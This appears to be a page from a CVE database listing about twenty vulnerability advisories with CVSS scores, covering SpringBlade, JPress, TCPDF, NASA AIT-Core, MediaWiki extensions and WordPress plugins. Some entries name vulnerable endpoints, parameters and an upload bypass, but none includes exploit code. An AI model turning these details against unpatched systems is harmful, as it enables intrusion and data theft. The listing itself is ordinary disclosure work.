Total
296548 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2020-16165 | 1 Bladex | 1 Springblade | 2025-06-03 | 7.5 HIGH | 9.8 CRITICAL |
| The DAO/DTO implementation in SpringBlade through 2.7.1 allows SQL Injection in an ORDER BY clause. This is related to the /api/blade-log/api/list ascs and desc parameters. | |||||
| CVE-2024-33332 | 1 Bladex | 1 Springblade | 2025-06-03 | N/A | 7.5 HIGH |
| An issue discovered in SpringBlade 3.7.1 allows attackers to obtain sensitive information via crafted GET request to api/blade-system/tenant. | |||||
| CVE-2024-43033 | 2 Jpress, Microsoft | 2 Jpress, Windows | 2025-06-03 | N/A | 8.8 HIGH |
| JPress through 5.1.1 on Windows has an arbitrary file upload vulnerability that could cause arbitrary code execution via ::$DATA to AttachmentController, such as a .jsp::$DATA file to io.jpress.web.commons.controller.AttachmentController#upload. NOTE: this is unrelated to the attack vector for CVE-2024-32358. | |||||
| CVE-2024-32358 | 1 Jpress | 1 Jpress | 2025-06-03 | N/A | 7.5 HIGH |
| An issue in Jpress v.5.1.0 allows a remote attacker to execute arbitrary code via a crafted script to the custom plug-in module function, a different vulnerability than CVE-2024-43033. | |||||
| CVE-2024-51058 | 1 Tcpdf Project | 1 Tcpdf | 2025-06-03 | N/A | 6.2 MEDIUM |
| Local File Inclusion (LFI) vulnerability has been discovered in TCPDF 6.7.5. This vulnerability enables a user to read arbitrary files from the server's file system through <img> src tag, potentially exposing sensitive information. | |||||
| CVE-2024-35061 | 1 Nasa | 1 Ait Core | 2025-06-03 | N/A | 7.3 HIGH |
| NASA AIT-Core v2.5.2 was discovered to use unencrypted channels to exchange data over the network, allowing attackers to execute a man-in-the-middle attack. When chained with CVE-2024-35059, the CVE in subject leads to an unauthenticated, fully remote code execution. | |||||
| CVE-2024-35060 | 1 Nasa | 1 Ait Core | 2025-06-03 | N/A | 7.5 HIGH |
| An issue in the YAML Python library of NASA AIT-Core v2.5.2 allows attackers to execute arbitrary commands via supplying a crafted YAML file. | |||||
| CVE-2024-35059 | 1 Nasa | 1 Ait Core | 2025-06-03 | N/A | 7.5 HIGH |
| An issue in the Pickle Python library of NASA AIT-Core v2.5.2 allows attackers to execute arbitrary commands. | |||||
| CVE-2025-4516 | 2025-06-03 | N/A | N/A | ||
| There is an issue in CPython when using `bytes.decode("unicode_escape", error="ignore|replace")`. If you are not using the "unicode_escape" encoding or an error handler your usage is not affected. To work-around this issue you may stop using the error= handler and instead wrap the bytes.decode() call in a try-except catching the DecodeError. | |||||
| CVE-2024-23178 | 1 Mediawiki | 1 Mediawiki | 2025-06-03 | N/A | 5.4 MEDIUM |
| An issue was discovered in the Phonos extension in MediaWiki before 1.40.2. PhonosButton.js allows i18n-based XSS via the phonos-purge-needed-error message. | |||||
| CVE-2024-23177 | 1 Mediawiki | 1 Mediawiki | 2025-06-03 | N/A | 6.1 MEDIUM |
| An issue was discovered in the WatchAnalytics extension in MediaWiki before 1.40.2. XSS can occur via the Special:PageStatistics page parameter. | |||||
| CVE-2024-23173 | 1 Mediawiki | 1 Mediawiki | 2025-06-03 | N/A | 6.1 MEDIUM |
| An issue was discovered in the Cargo extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:Drilldown page allows XSS via artist, album, and position parameters because of applied filter values in drilldown/CargoAppliedFilter.php. | |||||
| CVE-2024-22494 | 1 Jfinalcms Project | 1 Jfinalcms | 2025-06-03 | N/A | 5.4 MEDIUM |
| A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save mobile parameter, which allows remote attackers to inject arbitrary web script or HTML. | |||||
| CVE-2024-22492 | 1 Jfinalcms Project | 1 Jfinalcms | 2025-06-03 | N/A | 5.4 MEDIUM |
| A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save contact parameter, which allows remote attackers to inject arbitrary web script or HTML. | |||||
| CVE-2024-22028 | 1 3rrr-btob | 12 3r-tmc01, 3r-tmc01 Firmware, 3r-tmc02 and 9 more | 2025-06-03 | N/A | 4.6 MEDIUM |
| Insufficient technical documentation issue exists in thermal camera TMC series all firmware versions. The user of the affected product is not aware of the internally saved data. By accessing the affected product physically, an attacker may retrieve the internal data. | |||||
| CVE-2024-0230 | 1 Apple | 2 Magic Keyboard, Magic Keyboard Firmware | 2025-06-03 | N/A | 2.4 LOW |
| A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic. | |||||
| CVE-2023-7071 | 1 Wpdeveloper | 1 Essential Blocks | 2025-06-03 | N/A | 6.4 MEDIUM |
| The Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table of Contents block in all versions up to, and including, 4.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | |||||
| CVE-2023-7048 | 1 Premio | 1 My Sticky Bar | 2025-06-03 | N/A | 3.1 LOW |
| The My Sticky Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.6. This is due to missing or incorrect nonce validation in mystickymenu-contact-leads.php. This makes it possible for unauthenticated attackers to trigger the export of a CSV file containing contact leads via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Because the CSV file is exported to a public location, it can be downloaded during a very short window of time before it is automatically deleted by the export function. | |||||
| CVE-2023-7019 | 1 Themeisle | 1 Lightstart | 2025-06-03 | N/A | 4.3 MEDIUM |
| The LightStart – Maintenance Mode, Coming Soon and Landing Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the insert_template function in all versions up to, and including, 2.6.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to change page designs. | |||||
| CVE-2023-6988 | 1 Extendthemes | 1 Colibri Page Builder | 2025-06-03 | N/A | 6.4 MEDIUM |
| The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's extend_builder_render_js shortcode in all versions up to, and including, 1.0.239 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | |||||